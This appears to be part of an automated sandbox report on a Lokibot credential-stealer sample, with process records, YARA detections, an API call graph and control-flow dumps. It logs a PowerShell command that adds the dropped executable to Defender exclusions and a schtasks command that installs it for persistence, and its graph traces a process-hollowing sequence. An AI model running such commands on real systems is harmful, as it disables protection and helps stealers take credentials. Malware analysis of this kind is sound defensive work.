                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 42%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:15
                      Start time:14:17:37
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                      Imagebase:0x180000
                      File size:427'008 bytes
                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:17
                      Start time:14:17:37
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                      Imagebase:0x180000
                      File size:427'008 bytes
                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:19
                      Start time:14:17:38
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
                      Imagebase:0xd40000
                      File size:179'712 bytes
                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:21
                      Start time:14:17:39
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                      Imagebase:0x180000
                      File size:771'592 bytes
                      MD5 hash:0B67ADEB422396C047E87FA78A9E8E80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: Loki_1, Description: Loki Payload, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      Target ID:22
                      Start time:14:17:45
                      Start date:23/05/2024
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Imagebase:0x400000
                      File size:543'304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Reset < >

                        Execution Graph

                        Execution Coverage:20%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:112
                        Total number of Limit Nodes:10
                        execution_graph 8800 25ec04 8802 25eb0e 8800->8802 8801 25ed64 8802->8801 8804 46f1458 8802->8804 8805 46f1472 8804->8805 8806 46f147a 8805->8806 8821 46f18ab 8805->8821 8832 46f1811 8805->8832 8842 46f1ab2 8805->8842 8845 46f1e74 8805->8845 8848 46f1934 8805->8848 8855 46f1bda 8805->8855 8858 46f187c 8805->8858 8868 46f1fff 8805->8868 8875 46f18a3 8805->8875 8885 46f1a45 8805->8885 8889 46f1d27 8805->8889 8896 46f1d87 8805->8896 8904 46f1b2a 8805->8904 8911 46f196a 8805->8911 8806->8801 8823 46f1812 8821->8823 8822 46f23ab 8822->8806 8823->8822 8918 25e5dd 8823->8918 8922 25e5e8 8823->8922 8833 46f181c 8832->8833 8838 25e5dd CreateProcessA 8833->8838 8839 25e5e8 CreateProcessA 8833->8839 8834 46f2013 8834->8806 8930 25dbc0 8834->8930 8835 46f1915 8835->8834 8837 46f2128 8835->8837 8926 25dad0 8835->8926 8837->8806 8838->8835 8839->8835 8934 25e250 8842->8934 8938 25e128 8845->8938 8851 46f1940 8848->8851 8849 46f2013 8849->8806 8854 25dbc0 Wow64SetThreadContext 8849->8854 8850 46f22a4 8850->8806 8851->8849 8852 46f2128 8851->8852 8853 25dad0 ResumeThread 8851->8853 8852->8806 8853->8851 8854->8850 8857 25e250 WriteProcessMemory 8855->8857 8856 46f1bfe 8857->8856 8859 46f1812 8858->8859 8866 25e5dd CreateProcessA 8859->8866 8867 25e5e8 CreateProcessA 8859->8867 8860 46f2013 8860->8806 8865 25dbc0 Wow64SetThreadContext 8860->8865 8861 46f1915 8861->8860 8863 46f2128 8861->8863 8864 25dad0 ResumeThread 8861->8864 8862 46f22a4 8862->8806 8863->8806 8864->8861 8865->8862 8866->8861 8867->8861 8872 46f1940 8868->8872 8869 46f2013 8869->8806 8873 25dbc0 Wow64SetThreadContext 8869->8873 8870 46f22a4 8870->8806 8871 46f2128 8871->8806 8872->8869 8872->8871 8874 25dad0 ResumeThread 8872->8874 8873->8870 8874->8872 8876 46f1812 8875->8876 8882 25e5dd CreateProcessA 8876->8882 8883 25e5e8 CreateProcessA 8876->8883 8877 46f2013 8877->8806 8881 25dbc0 Wow64SetThreadContext 8877->8881 8878 46f1915 8878->8877 8880 46f2128 8878->8880 8884 25dad0 ResumeThread 8878->8884 8879 46f22a4 8879->8806 8880->8806 8881->8879 8882->8878 8883->8878 8884->8878 8886 46f1a5c 8885->8886 8888 25e250 WriteProcessMemory 8886->8888 8887 46f1bbb 8887->8806 8888->8887 8891 46f1940 8889->8891 8890 46f2013 8890->8806 8895 25dbc0 Wow64SetThreadContext 8890->8895 8891->8889 8891->8890 8893 46f2128 8891->8893 8894 25dad0 ResumeThread 8891->8894 8892 46f22a4 8892->8806 8893->8806 8894->8891 8895->8892 8942 25e3b0 8896->8942 8897 46f2013 8897->8806 8903 25dbc0 Wow64SetThreadContext 8897->8903 8898 46f22a4 8898->8806 8899 46f2128 8899->8806 8900 46f1940 8900->8897 8900->8899 8901 25dad0 ResumeThread 8900->8901 8901->8900 8903->8898 8908 46f1940 8904->8908 8905 46f2013 8905->8806 8910 25dbc0 Wow64SetThreadContext 8905->8910 8906 46f22a4 8906->8806 8907 46f2128 8907->8806 8908->8905 8908->8907 8909 25dad0 ResumeThread 8908->8909 8909->8908 8910->8906 8913 46f1940 8911->8913 8912 46f2128 8912->8806 8913->8912 8914 46f2013 8913->8914 8917 25dad0 ResumeThread 8913->8917 8914->8806 8916 25dbc0 Wow64SetThreadContext 8914->8916 8915 46f22a4 8915->8806 8916->8915 8917->8913 8919 25e66f CreateProcessA 8918->8919 8921 25e8cd 8919->8921 8923 25e66f CreateProcessA 8922->8923 8925 25e8cd 8923->8925 8927 25db14 ResumeThread 8926->8927 8929 25db66 8927->8929 8929->8835 8931 25dc09 Wow64SetThreadContext 8930->8931 8933 25dc87 8931->8933 8933->8806 8935 25e29c WriteProcessMemory 8934->8935 8937 25e33b 8935->8937 8937->8806 8939 25e16c VirtualAllocEx 8938->8939 8941 25e1ea 8939->8941 8943 25e3fc ReadProcessMemory 8942->8943 8945 25e47a 8943->8945 8945->8900 8946 25eb74 8947 25eb0e 8946->8947 8948 25ed64 8947->8948 8949 46f1458 7 API calls 8947->8949 8949->8948

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 74 251a10-251a4b 75 251a52-251a9a 74->75 76 251a4d 74->76 77 251a9b 75->77 76->75 78 251aa2-251abe 77->78 79 251ac7-251ac8 78->79 80 251ac0 78->80 102 251b13-251b5b 79->102 80->77 80->79 81 251c67-251c7a 80->81 82 251e27 80->82 83 251ca3-251cb6 80->83 84 251ba2-251bb5 80->84 85 251c29-251c3b 80->85 86 251de9-251dfc 80->86 87 251aea call 252280 80->87 88 251d35-251d47 80->88 89 251bb7-251bcf 80->89 90 251e73-251e86 80->90 91 251cf2-251d18 80->91 92 251c7f-251c9e 80->92 93 251dfe 80->93 94 251cbb-251cbf 80->94 95 251c02-251c27 80->95 96 251b8d-251ba0 80->96 97 251dc9-251de7 80->97 98 251e88 80->98 99 251aca 80->99 100 251e56-251e71 80->100 101 251bd0 80->101 80->102 103 251d1d-251d30 80->103 104 251b5e 80->104 105 251d9a 80->105 108 251bd7-251bf3 81->108 106 251e2e-251e4a 82->106 83->108 107 251b65-251b81 84->107 109 251c3d-251c4c 85->109 110 251c4e-251c55 85->110 113 251da1-251dbd 86->113 133 251af0-251b11 87->133 179 251d4d call 252820 88->179 180 251d4d call 252830 88->180 89->101 90->106 91->108 92->108 93->82 111 251cc1-251cd0 94->111 112 251cd2-251cd9 94->112 95->108 96->107 97->113 115 251f3e 98->115 182 251acf call 252231 99->182 183 251acf call 252240 99->183 100->106 101->108 102->104 103->108 104->107 105->113 129 251e53-251e54 106->129 130 251e4c 106->130 119 251b83 107->119 120 251b8a-251b8b 107->120 124 251bf5 108->124 125 251bfc-251bfd 108->125 128 251c5c-251c62 109->128 110->128 114 251ce0-251ced 111->114 112->114 122 251dc6-251dc7 113->122 123 251dbf 113->123 114->108 134 251f45-251f61 115->134 119->81 119->82 119->83 119->84 119->85 119->86 119->88 119->89 119->90 119->91 119->92 119->93 119->94 119->95 119->96 119->97 119->98 119->100 119->101 119->103 119->104 119->105 119->120 120->89 122->93 123->82 123->86 123->90 123->93 123->97 123->98 123->100 123->105 123->115 123->122 135 25204e-252071 call 2550c8 123->135 136 25202e-252031 call 46f2610 123->136 137 25218b-252192 123->137 138 2520b4-25213b call 2548e8 123->138 139 252173-252186 123->139 140 251f7c-251fe4 123->140 124->81 124->82 124->83 124->85 124->86 124->88 124->90 124->91 124->92 124->93 124->94 124->95 124->97 124->98 124->100 124->101 124->103 124->105 124->125 125->88 128->108 129->98 130->82 130->90 130->98 130->100 130->115 130->129 130->135 130->136 130->137 130->138 130->139 130->140 131 251ad5-251ae8 131->78 133->78 141 251f76-251f77 134->141 142 251f63 134->142 177 252076 call 255344 135->177 178 252076 call 255348 135->178 146 252037-252049 136->146 173 25213e call 252820 138->173 174 25213e call 252830 138->174 160 251fe6-251ff2 140->160 161 25200e 140->161 141->137 142->115 142->135 142->136 142->137 142->138 142->139 142->140 142->141 144 251d53-251d98 144->93 144->105 146->134 152 25207c-252088 call 255808 156 25208e-2520af 152->156 162 251ff4-251ffa 160->162 163 251ffc-252002 160->163 164 252014-252029 161->164 166 25200c 162->166 163->166 164->134 166->164 168 252144-252153 175 252156 call 2562a8 168->175 176 252156 call 2562b8 168->176 169 25215c-25216e 173->168 174->168 175->169 176->169 177->152 178->152 179->144 180->144 182->131 183->131
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: $p$$p$5$z-,
                        • API String ID: 0-3342674042
                        • Opcode ID: 2814507994d0705c68f2ec62b2cc32ed2765642cdd7b03c3ae31c6db6d57118c
                        • Instruction ID: 2a2065a681aedd68612f10565abc27e6abf42a84491c7a4aa89fe53b5d857687
                        • Opcode Fuzzy Hash: 2814507994d0705c68f2ec62b2cc32ed2765642cdd7b03c3ae31c6db6d57118c
                        • Instruction Fuzzy Hash: A6125974E11218CFDB18CFA9D944B9DBBB2FF89301F2090AAD80AB7254DB749955CF18

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 185 251e8b-251f0b 191 251f35 185->191 192 251f0d-251f19 185->192 195 251f3b 191->195 193 251f23-251f29 192->193 194 251f1b-251f21 192->194 196 251f33 193->196 194->196 197 251f3e 195->197 196->195 198 251f45-251f61 197->198 199 251f76-251f77 198->199 200 251f63 198->200 206 25218b-252192 199->206 200->197 200->199 201 2520b4-25213b call 2548e8 200->201 202 252173-252186 200->202 203 251f7c-251fe4 200->203 204 25204e-252071 call 2550c8 200->204 205 25202e-252031 call 46f2610 200->205 200->206 234 25213e call 252820 201->234 235 25213e call 252830 201->235 219 251fe6-251ff2 203->219 220 25200e 203->220 229 252076 call 255344 204->229 230 252076 call 255348 204->230 209 252037-252049 205->209 209->198 213 25207c-252088 call 255808 216 25208e-2520af 213->216 221 251ff4-251ffa 219->221 222 251ffc-252002 219->222 223 252014-252029 220->223 225 25200c 221->225 222->225 223->198 225->223 227 252144-252153 236 252156 call 2562a8 227->236 237 252156 call 2562b8 227->237 228 25215c-25216e 229->213 230->213 234->227 235->227 236->228 237->228
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: $p$$p$$p
                        • API String ID: 0-4193490398
                        • Opcode ID: 6c215fe72baa617897778ee596cdc959df3b286cc0827438822d530ab585f1b0
                        • Instruction ID: 5e1d38eedd8ecda6ba3862fce9d32553d7f1a740010b763363a0800753ece2aa
                        • Opcode Fuzzy Hash: 6c215fe72baa617897778ee596cdc959df3b286cc0827438822d530ab585f1b0
                        • Instruction Fuzzy Hash: D181D274E11228CFDB64DFA8D954B9DBBB2FB88301F2081AAD809A7354DB745E91CF14

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 239 255808-255830 240 255837-255877 239->240 241 255832 239->241 242 255878 240->242 241->240 243 25587f-25589b 242->243 244 2558a4-2558a5 243->244 245 25589d 243->245 260 255b7c-255b85 244->260 245->242 245->244 246 2559c5-2559dc 245->246 247 255a25-255a38 245->247 248 255b65-255b77 245->248 249 255924-255937 245->249 250 2559a7-2559c0 245->250 251 25598f-2559a2 245->251 252 2558ee-255903 245->252 253 255b2e-255b44 245->253 254 255b49-255b60 245->254 255 255908-25591f 245->255 256 2558aa-2558ae 245->256 257 255ad0-255ad9 245->257 258 255a3d-255a9a call 255748 245->258 259 25593c-255953 245->259 245->260 261 255a9f-255ab4 245->261 262 255ade-255b04 call 255660 245->262 263 2558de-2558ec 245->263 264 255ab9-255acb 245->264 265 255958-25595c 245->265 279 2559e6-255a20 246->279 247->243 248->243 249->243 250->243 251->243 252->243 253->243 254->243 255->243 269 2558c1-2558c8 256->269 270 2558b0-2558bf 256->270 257->243 258->243 259->243 261->243 277 255b0e-255b29 262->277 263->243 264->243 266 25596f-255976 265->266 267 25595e-25596d 265->267 273 25597d-25598a 266->273 267->273 275 2558cf-2558dc 269->275 270->275 273->243 275->243 277->243 279->243
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: UJ$yO6
                        • API String ID: 0-870398751
                        • Opcode ID: 798fb5e7553742734ed5702ad8b89547acc13de183362c1731fda8aeb2b4381b
                        • Instruction ID: 69f792c12391894856be6ffadb8354243497bcbba303b77643426924a09ed481
                        • Opcode Fuzzy Hash: 798fb5e7553742734ed5702ad8b89547acc13de183362c1731fda8aeb2b4381b
                        • Instruction Fuzzy Hash: 82B15770D25629DFCB18CFA6D99459EFBF2FF89300F20942AD816AB224D7349946CF44

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 283 255348-25536d 284 255374-2553a5 283->284 285 25536f 283->285 286 2553a6 284->286 285->284 287 2553ad-2553c9 286->287 288 2553d2-2553d3 287->288 289 2553cb 287->289 299 2555f7-255600 288->299 304 2553d8-2553eb 288->304 289->286 290 255445-255449 289->290 291 255406-255419 289->291 292 255581-255593 289->292 293 255521-255539 289->293 294 2554c3-2554c6 289->294 295 2553ed-255404 289->295 296 25550e-25551c 289->296 297 25556a-25557c 289->297 298 2554f4-255509 289->298 289->299 300 2555b0-2555d7 289->300 301 25547c-2554be 289->301 302 2555dc-2555f2 289->302 303 25553e-255565 289->303 289->304 305 255598-2555ab 289->305 308 25545c-255463 290->308 309 25544b-25545a 290->309 306 25542c-255433 291->306 307 25541b-25542a 291->307 292->287 293->287 313 2554cf-2554ef 294->313 295->287 296->287 297->287 298->287 300->287 301->287 302->287 303->287 304->287 305->287 312 25543a-255440 306->312 307->312 314 25546a-255477 308->314 309->314 312->287 313->287 314->287
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: !>c8$%)Y
                        • API String ID: 0-2922296349
                        • Opcode ID: f303d2d6d8358464e9fcc43cca907eb2b45dbb2533db1800f70687bffda3defe
                        • Instruction ID: db2917f6dd76366fa6adbd29085e053460f3a8f8ead83e944cc01964219f4744
                        • Opcode Fuzzy Hash: f303d2d6d8358464e9fcc43cca907eb2b45dbb2533db1800f70687bffda3defe
                        • Instruction Fuzzy Hash: 2A815A70D24619EFCF08CFA6E59099EFBB2FF89341F20942AE419AB224E7709545CF44

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 317 255344-25536d 319 255374-2553a5 317->319 320 25536f 317->320 321 2553a6 319->321 320->319 322 2553ad-2553c9 321->322 323 2553d2-2553d3 322->323 324 2553cb 322->324 334 2555f7-255600 323->334 339 2553d8-2553eb 323->339 324->321 325 255445-255449 324->325 326 255406-255419 324->326 327 255581-255593 324->327 328 255521-255539 324->328 329 2554c3-2554c6 324->329 330 2553ed-255404 324->330 331 25550e-25551c 324->331 332 25556a-25557c 324->332 333 2554f4-255509 324->333 324->334 335 2555b0-2555d7 324->335 336 25547c-2554be 324->336 337 2555dc-2555f2 324->337 338 25553e-255565 324->338 324->339 340 255598-2555ab 324->340 343 25545c-255463 325->343 344 25544b-25545a 325->344 341 25542c-255433 326->341 342 25541b-25542a 326->342 327->322 328->322 348 2554cf-2554ef 329->348 330->322 331->322 332->322 333->322 335->322 336->322 337->322 338->322 339->322 340->322 347 25543a-255440 341->347 342->347 349 25546a-255477 343->349 344->349 347->322 348->322 349->322
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: !>c8$%)Y
                        • API String ID: 0-2922296349
                        • Opcode ID: fd7ce6ad32a2a6946cb52e31778ebee71f883d5daeef10ea1fa377afeeb3b8ff
                        • Instruction ID: 3d6bd6adad31dde9d7de38a1694de82774fe0501bdb1d404fc3c5d071d2e917f
                        • Opcode Fuzzy Hash: fd7ce6ad32a2a6946cb52e31778ebee71f883d5daeef10ea1fa377afeeb3b8ff
                        • Instruction Fuzzy Hash: 00814970D24619EFCF08CFA6E58099EFBB2FF89341F20942AE419AB224E7709555CF44

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: U
                        • API String ID: 0-3372436214
                        • Opcode ID: 862c8f17e48b5017b6fb0b38ae26d96224cd949fe66913c6940e10003c79f5d4
                        • Instruction ID: 66ab12278421d44084f0a04fc8de0ee77dfa8bbb719755934bc85b58136700f0
                        • Opcode Fuzzy Hash: 862c8f17e48b5017b6fb0b38ae26d96224cd949fe66913c6940e10003c79f5d4
                        • Instruction Fuzzy Hash: B7120834A10318CFDB14EFA4C894A9DBBB2FF8A300F1585A9D409AB365DB30AD95CF54
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: $p
                        • API String ID: 0-982128392
                        • Opcode ID: 5f65818e030caf445f35c1be3475912dca84cbed6e891e7203c631c387af964a
                        • Instruction ID: 335bed74890cbf99fd83b03fa3a8e613b105b0f64f8e305c16f82741c86f51eb
                        • Opcode Fuzzy Hash: 5f65818e030caf445f35c1be3475912dca84cbed6e891e7203c631c387af964a
                        • Instruction Fuzzy Hash: E3713774E10218CFEB14CFA8D945B9DBBB2FB88301F2081AAD809A7354DB709E95CF14
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: $p
                        • API String ID: 0-982128392
                        • Opcode ID: 8ff469f35082810ffe5f1e30ab7ba8543115a816da5829725d34eeae8f614f05
                        • Instruction ID: 8662b39033916d70d738e6bb9d55468cfff26c2b3e5273f13ec7905941c4298c
                        • Opcode Fuzzy Hash: 8ff469f35082810ffe5f1e30ab7ba8543115a816da5829725d34eeae8f614f05
                        • Instruction Fuzzy Hash: 93714874E10218CFEB54DFA8D945B9DBBB2FB88301F2085AAD809A7354DB709E95CF14
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bdc7dc5edddd285d369ce32283cc487588905bb04a85169923d1237aa1837636
                        • Instruction ID: 4a2826faa30636b45beb68bc6221f6780f7d4363d14bdd7963edac01290567db
                        • Opcode Fuzzy Hash: bdc7dc5edddd285d369ce32283cc487588905bb04a85169923d1237aa1837636
                        • Instruction Fuzzy Hash: F202F734A10319CFDB14EFA4C890A9DBBB2FF8A300F1585A9E4096B365DB30AD95CF54
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96a9561353ea7c297b884e36de18f8a8515d89280c854e776bb1fddda860d4b5
                        • Instruction ID: dc410d2681241a27b78c62e63050062f0cdc021e1de118e1f0c4ecd0f420a897
                        • Opcode Fuzzy Hash: 96a9561353ea7c297b884e36de18f8a8515d89280c854e776bb1fddda860d4b5
                        • Instruction Fuzzy Hash: 88314B70D15258CFEB08CFA6C8457EEBBF6BF89301F14C06AC809A6254DB740989CF95
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2b7b8a313d0c12b9da4eb520d441a1ba800b61698bed31685146d446c251d3ad
                        • Instruction ID: 0608fa4c2e9c20baa7f50f96a9d51984074261f4d0f974659b701bcf5c76a125
                        • Opcode Fuzzy Hash: 2b7b8a313d0c12b9da4eb520d441a1ba800b61698bed31685146d446c251d3ad
                        • Instruction Fuzzy Hash: 65A00251E9E008C091405C541A510F7C57C221B2C5F95319096BA370973412F45B2C5D

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 465 25e5dd-25e681 467 25e683-25e69a 465->467 468 25e6ca-25e6f2 465->468 467->468 471 25e69c-25e6a1 467->471 472 25e6f4-25e708 468->472 473 25e738-25e78e 468->473 474 25e6c4-25e6c7 471->474 475 25e6a3-25e6ad 471->475 472->473 483 25e70a-25e70f 472->483 481 25e7d4-25e8cb CreateProcessA 473->481 482 25e790-25e7a4 473->482 474->468 476 25e6b1-25e6c0 475->476 477 25e6af 475->477 476->476 480 25e6c2 476->480 477->476 480->474 501 25e8d4-25e9b9 481->501 502 25e8cd-25e8d3 481->502 482->481 491 25e7a6-25e7ab 482->491 484 25e711-25e71b 483->484 485 25e732-25e735 483->485 488 25e71d 484->488 489 25e71f-25e72e 484->489 485->473 488->489 489->489 490 25e730 489->490 490->485 493 25e7ad-25e7b7 491->493 494 25e7ce-25e7d1 491->494 495 25e7b9 493->495 496 25e7bb-25e7ca 493->496 494->481 495->496 496->496 498 25e7cc 496->498 498->494 514 25e9c9-25e9cd 501->514 515 25e9bb-25e9bf 501->515 502->501 517 25e9dd-25e9e1 514->517 518 25e9cf-25e9d3 514->518 515->514 516 25e9c1 515->516 516->514 520 25e9f1-25e9f5 517->520 521 25e9e3-25e9e7 517->521 518->517 519 25e9d5 518->519 519->517 523 25e9f7-25ea20 520->523 524 25ea2b-25ea36 520->524 521->520 522 25e9e9 521->522 522->520 523->524 528 25ea37 524->528 528->528
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025E8AF
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 1c9004fa869107454195da842b7f9070c4afefaa5d261076df3e2b86b2b8b695
                        • Instruction ID: 1702203971829822864a58d11a0ef4ec665debfb85915f7faa9e0b50282dac7e
                        • Opcode Fuzzy Hash: 1c9004fa869107454195da842b7f9070c4afefaa5d261076df3e2b86b2b8b695
                        • Instruction Fuzzy Hash: 56C13970D102298FDF25CFA8C841BEDBBB1BF09300F0095A9D859B7294DB749A99CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 529 25e5e8-25e681 531 25e683-25e69a 529->531 532 25e6ca-25e6f2 529->532 531->532 535 25e69c-25e6a1 531->535 536 25e6f4-25e708 532->536 537 25e738-25e78e 532->537 538 25e6c4-25e6c7 535->538 539 25e6a3-25e6ad 535->539 536->537 547 25e70a-25e70f 536->547 545 25e7d4-25e8cb CreateProcessA 537->545 546 25e790-25e7a4 537->546 538->532 540 25e6b1-25e6c0 539->540 541 25e6af 539->541 540->540 544 25e6c2 540->544 541->540 544->538 565 25e8d4-25e9b9 545->565 566 25e8cd-25e8d3 545->566 546->545 555 25e7a6-25e7ab 546->555 548 25e711-25e71b 547->548 549 25e732-25e735 547->549 552 25e71d 548->552 553 25e71f-25e72e 548->553 549->537 552->553 553->553 554 25e730 553->554 554->549 557 25e7ad-25e7b7 555->557 558 25e7ce-25e7d1 555->558 559 25e7b9 557->559 560 25e7bb-25e7ca 557->560 558->545 559->560 560->560 562 25e7cc 560->562 562->558 578 25e9c9-25e9cd 565->578 579 25e9bb-25e9bf 565->579 566->565 581 25e9dd-25e9e1 578->581 582 25e9cf-25e9d3 578->582 579->578 580 25e9c1 579->580 580->578 584 25e9f1-25e9f5 581->584 585 25e9e3-25e9e7 581->585 